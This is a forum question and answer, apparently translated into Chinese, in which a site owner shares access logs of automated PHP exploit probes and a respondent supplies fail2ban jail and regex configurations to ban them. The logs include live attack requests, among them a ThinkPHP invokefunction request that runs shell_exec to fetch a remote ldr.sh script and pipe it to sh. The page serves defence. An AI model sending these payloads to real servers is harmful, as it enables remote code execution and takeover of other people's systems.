网络服务器受到攻击

网络服务器受到攻击

我的网络服务器不断受到利用 PHP 漏洞和使用 GET 请求的攻击。我应该有多担心自己是否被入侵,我该如何检查,因为有些请求返回 302,有些返回 200。如果我被入侵,最好的方法是保留我当前的服务器配置并删除不需要的脚本。我提供的示例是最近一天内的示例,这只是一些示例,可以让您了解问题的严重程度。我应该如何应对这种情况?我也安装了 fail2ban。我可以为您提供任何额外的示例/数据来帮助我解决这个问题!提前谢谢您!

一些访问日志信息:

示例 1:

     - - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
     - - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
   - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
 - - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
  - - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

示例 2:

- - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1"
This line being spammed over 200 times

示例 3:

- - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041 

答案1

我已经安装了 fail2ban

仅安装 fail2ban 是不够的,您必须对其进行配置以满足您的需求。Fail2ban 只是一个工具,与许多其他工具一样,需要正确使用。

为了阻止这样的“洪水”,基本上有 3 种主要方法:

  1. 如果你确定你的网页基本上没有一些损坏的链接,那么对 404(或其他 40x)响应做出反应就足够了:
[bad-http]
logpath = /path/to/your/log
filter =
# fail on every 40x (excepting 401 for authentication attempt, which should be handled separately):
failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

并且您必须检查(并且可能更正)导致 302 重定向的规则(可能是此重定向仅影响 URI 的某些白名单)。

  1. 如果你不能确定或者需要更精确的处理,你必须制作一些这个机器人经常使用的阻止列表 URI(或者检查引荐来源或一些 cookie 或其他任何东西),例如:
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (uris starting with this block-list):
_blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

请注意,在这种情况下,您必须检查阻止列表中的 URI 前缀是否与您的合法 URI 冲突,并持续维护此列表。还请注意,“入侵者”要避免被禁止非常简单,只需更改 URI(例如,在您的前缀前添加其他参数)

  1. 与 2 相同,但使用有效 URI 的白名单:
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (excepting given white-list):
_whitelist = my-app|other-app
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true

您可以在此处指定所有有效的前缀 RE,_whitelist以完全避免合法 URI 出现可能的误报。

不管你使用什么,你可以从大maxretry(和短findtime)和小的值开始bantime(这样可以避免过长的禁令而导致可能的误报),并且如果你的fail2ban版本> = 0.10并且启用了bantime.increment,那么惯犯以后会被禁止更长的时间和更快。

还请考虑https://github.com/fail2ban/fail2ban/wiki/Best-practice获得一些关于如何更有效地配置 fail2ban 监狱和过滤器的建议。

相关内容